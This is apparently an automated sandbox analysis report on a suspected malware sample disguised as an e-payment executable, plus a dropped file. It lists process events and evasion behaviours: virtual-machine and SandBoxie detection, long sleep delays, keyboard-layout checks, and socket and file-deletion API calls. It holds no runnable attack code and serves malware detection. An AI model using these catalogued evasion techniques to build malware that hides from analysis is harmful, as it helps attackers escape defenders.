            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Yara detected AntiVM3
            Source: Yara matchFile source: Process Memory Space: e-Payment.NET.CMS4006975815.exe PID: 7552, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: JXHPwNYzysUjKo.exe PID: 8008, type: MEMORYSTR
            Contains functionality to detect virtual machines (IN, VMware)
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_00401102 in eax, dx13_2_00401102
            Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
            Source: JXHPwNYzysUjKo.exe, JXHPwNYzysUjKo.exe, 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
            Source: JXHPwNYzysUjKo.exe, 0000000D.00000002.1423533944.0000000000400000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: TSBIEDLL.DLL
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeMemory allocated: 650000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeMemory allocated: 26D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeMemory allocated: 2360000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeMemory allocated: 57D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeMemory allocated: 67D0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeMemory allocated: 6A00000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeMemory allocated: 7A00000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeMemory allocated: EE0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeMemory allocated: 2840000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeMemory allocated: 4840000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeMemory allocated: 5C60000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeMemory allocated: 6C60000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeMemory allocated: 6EA0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeMemory allocated: 7EA0000 memory reserve | memory write watchJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6566Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1229Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6817Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 739Jump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeWindow / User API: threadDelayed 469Jump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeWindow / User API: threadDelayed 1426Jump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeWindow / User API: threadDelayed 7364Jump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exeWindow / User API: foregroundWindowGot 1766Jump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeEvaded block: after key decisiongraph_13-3931
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeAPI coverage: 2.2 %
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe TID: 7572Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7768Thread sleep count: 6566 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7972Thread sleep time: -5534023222112862s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7748Thread sleep count: 1229 > 30Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7892Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7988Thread sleep time: -5534023222112862s >= -30000sJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7936Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe TID: 7976Thread sleep count: 469 > 30Jump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe TID: 7976Thread sleep time: -4690000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe TID: 7984Thread sleep count: 1426 > 30Jump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe TID: 7984Thread sleep time: -713000s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe TID: 7984Thread sleep count: 7364 > 30Jump to behavior
            Source: C:\Users\user\Desktop\e-Payment.NET.CMS4006975815.exe TID: 7984Thread sleep time: -3682000s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exe TID: 8044Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_0040374A GetKeyboardLayout followed by cmp: cmp ax, cx and CTI: je 0040376Fh13_2_0040374A
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_0040374A GetKeyboardLayout followed by cmp: cmp ax, dx and CTI: jne 0040376Fh13_2_0040374A
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_00402C45 _EH_prolog,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,socket,connect,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,_CxxThrowException,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,_CxxThrowException,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,_CxxThrowException,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hs13_2_00402C45
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_0040BC9B ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindNextFileW,FindNextFileW,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,13_2_0040BC9B
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_00403183 wcscmp,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,FindFirstFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,wcscmp,wcscmp,wcscmp,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@G@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ,?find@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIABV12@I@Z,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,FindNextFileW,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$all13_2_00403183
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_0040F234 SetFileAttributesA,FindFirstFileA,FindNextFileA,RemoveDirectoryA,SetFileAttributesA,DeleteFileA,GetLastError,FindClose,RemoveDirectoryA,FindClose,13_2_0040F234
            Source: C:\Users\user\AppData\Roaming\JXHPwNYzysUjKo.exeCode function: 13_2_00405AFB Sleep,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,getenv,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,FindFirstFileA,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,FindClose,FindNextFileA,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z,??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,DeleteFileA,GetLastError,FindNextFileA,FindClose,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z,FindClose,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,13_2_00405AFB
